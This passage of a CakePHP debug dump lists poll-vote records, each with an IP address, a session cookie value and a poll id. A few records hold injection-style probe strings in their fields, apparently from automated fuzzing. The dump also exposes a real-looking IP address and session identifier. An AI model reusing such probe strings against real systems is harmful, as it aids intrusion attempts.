'id' => '6345',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5803 => array(
'id' => '6346',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5804 => array(
'id' => '6347',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5805 => array(
'id' => '6348',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5806 => array(
'id' => '6349',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5807 => array(
'id' => '6350',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5808 => array(
'id' => '6351',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5809 => array(
'id' => '6352',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5810 => array(
'id' => '6353',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5811 => array(
'id' => '6354',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5812 => array(
'id' => '6355',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5813 => array(
'id' => '6356',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5814 => array(
'id' => '6357',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5815 => array(
'id' => '6358',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5816 => array(
'id' => '6359',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5817 => array(
'id' => '6360',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5818 => array(
'id' => '6361',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5819 => array(
'id' => '6362',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5820 => array(
'id' => '6363',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5821 => array(
'id' => '6364',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5822 => array(
'id' => '6365',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5823 => array(
'id' => '6366',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5824 => array(
'id' => '6367',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5825 => array(
'id' => '6368',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5826 => array(
'id' => '6369',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2&n923666=v941885',
'sondage_id' => '2'
),
(int) 5827 => array(
'id' => '6370',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5828 => array(
'id' => '6371',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5829 => array(
'id' => '6372',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5830 => array(
'id' => '6373',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5831 => array(
'id' => '6374',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5832 => array(
'id' => '6375',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5833 => array(
'id' => '6376',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5834 => array(
'id' => '6377',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5835 => array(
'id' => '6378',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5836 => array(
'id' => '6379',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5837 => array(
'id' => '6380',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5838 => array(
'id' => '6381',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5839 => array(
'id' => '6382',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5840 => array(
'id' => '6383',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5841 => array(
'id' => '6384',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5842 => array(
'id' => '6385',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5843 => array(
'id' => '6386',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5844 => array(
'id' => '6387',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5845 => array(
'id' => '6388',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5846 => array(
'id' => '6389',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5847 => array(
'id' => '6390',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5848 => array(
'id' => '6391',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5849 => array(
'id' => '6392',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5850 => array(
'id' => '6393',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5851 => array(
'id' => '6394',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5852 => array(
'id' => '6395',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5853 => array(
'id' => '6396',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5854 => array(
'id' => '6397',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5855 => array(
'id' => '6398',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5856 => array(
'id' => '6399',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5857 => array(
'id' => '6400',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5858 => array(
'id' => '6401',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5859 => array(
'id' => '6402',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5860 => array(
'id' => '6403',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5861 => array(
'id' => '6404',
'ip' => ')',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5862 => array(
'id' => '6405',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5863 => array(
'id' => '6406',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5864 => array(
'id' => '6407',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5865 => array(
'id' => '6408',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5866 => array(
'id' => '6409',
'ip' => '!(()&&!|*|*|',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5867 => array(
'id' => '6410',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5868 => array(
'id' => '6411',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5869 => array(
'id' => '6412',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5870 => array(
'id' => '6413',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5871 => array(
'id' => '6414',
'ip' => '^(#$!@#$)(()))******',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5872 => array(
'id' => '6415',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5873 => array(
'id' => '6416',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5874 => array(
'id' => '6417',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5875 => array(
'id' => '6418',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5876 => array(
'id' => '6419',
'ip' => '85.190.233.47',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 5877 => array(
'id' => '6420',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5878 => array(
'id' => '6421',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5879 => array(
'id' => '6422',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5880 => array(
'id' => '6423',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5881 => array(
'id' => '6424',
'ip' => '85.190.233.47',
'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 5882 => array(
'id' => '6425',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5883 => array(
'id' => '6426',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5884 => array(
'id' => '6427',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5885 => array(
'id' => '6428',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5886 => array(
'id' => '6429',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5887 => array(
'id' => '6430',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5888 => array(
'id' => '6431',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5889 => array(
'id' => '6432',
'ip' => '85.190.233.47',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 5890 => array(
'id' => '6433',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5891 => array(
'id' => '6434',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5892 => array(
'id' => '6435',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5893 => array(
'id' => '6436',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5894 => array(
'id' => '6437',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5895 => array(
'id' => '6438',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5896 => array(
'id' => '6439',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5897 => array(
'id' => '6440',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5898 => array(
'id' => '6441',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5899 => array(
'id' => '6442',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5900 => array(
'id' => '6443',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5901 => array(
'id' => '6444',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5902 => array(
'id' => '6445',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5903 => array(
'id' => '6446',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5904 => array(
'id' => '6447',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5905 => array(
'id' => '6448',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5906 => array(
'id' => '6449',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5907 => array(
'id' => '6450',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5908 => array(
'id' => '6451',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5909 => array(
'id' => '6452',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5910 => array(
'id' => '6453',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5911 => array(
'id' => '6454',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5912 => array(
'id' => '6455',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5913 => array(
'id' => '6456',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5914 => array(
'id' => '6457',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5915 => array(
'id' => '6458',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5916 => array(
'id' => '6459',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5917 => array(
'id' => '6460',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5918 => array(
'id' => '6461',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5919 => array(
'id' => '6462',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5920 => array(
'id' => '6463',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5921 => array(
'id' => '6464',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5922 => array(
'id' => '6465',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5923 => array(
'id' => '6466',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5924 => array(
'id' => '6467',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5925 => array(
'id' => '6468',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5926 => array(
'id' => '6469',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5927 => array(
'id' => '6470',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5928 => array(
'id' => '6471',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5929 => array(
'id' => '6472',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5930 => array(
'id' => '6473',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5931 => array(
'id' => '6474',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5932 => array(
'id' => '6475',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5933 => array(
'id' => '6476',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5934 => array(
'id' => '6477',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5935 => array(
'id' => '6478',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5936 => array(
'id' => '6479',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5937 => array(
'id' => '6480',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5938 => array(
'id' => '6481',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5939 => array(
'id' => '6482',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5940 => array(
'id' => '6483',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5941 => array(
'id' => '6484',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5942 => array(
'id' => '6485',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5943 => array(
'id' => '6486',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5944 => array(
'id' => '6487',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5945 => array(
'id' => '6488',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5946 => array(
'id' => '6489',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5947 => array(
'id' => '6490',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5948 => array(
'id' => '6491',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5949 => array(
'id' => '6492',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5950 => array(
'id' => '6493',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5951 => array(
'id' => '6494',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5952 => array(
'id' => '6495',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5953 => array(
'id' => '6496',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5954 => array(
'id' => '6497',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5955 => array(
'id' => '6498',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5956 => array(
'id' => '6499',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5957 => array(
'id' => '6500',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5958 => array(
'id' => '6501',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5959 => array(
'id' => '6502',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5960 => array(
'id' => '6503',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5961 => array(
'id' => '6504',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5962 => array(
'id' => '6505',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5963 => array(
'id' => '6506',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5964 => array(
'id' => '6507',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5965 => array(
'id' => '6508',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5966 => array(
'id' => '6509',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5967 => array(
'id' => '6510',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5968 => array(
'id' => '6511',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5969 => array(
'id' => '6512',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5970 => array(
'id' => '6513',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5971 => array(
'id' => '6514',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5972 => array(
'id' => '6515',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5973 => array(
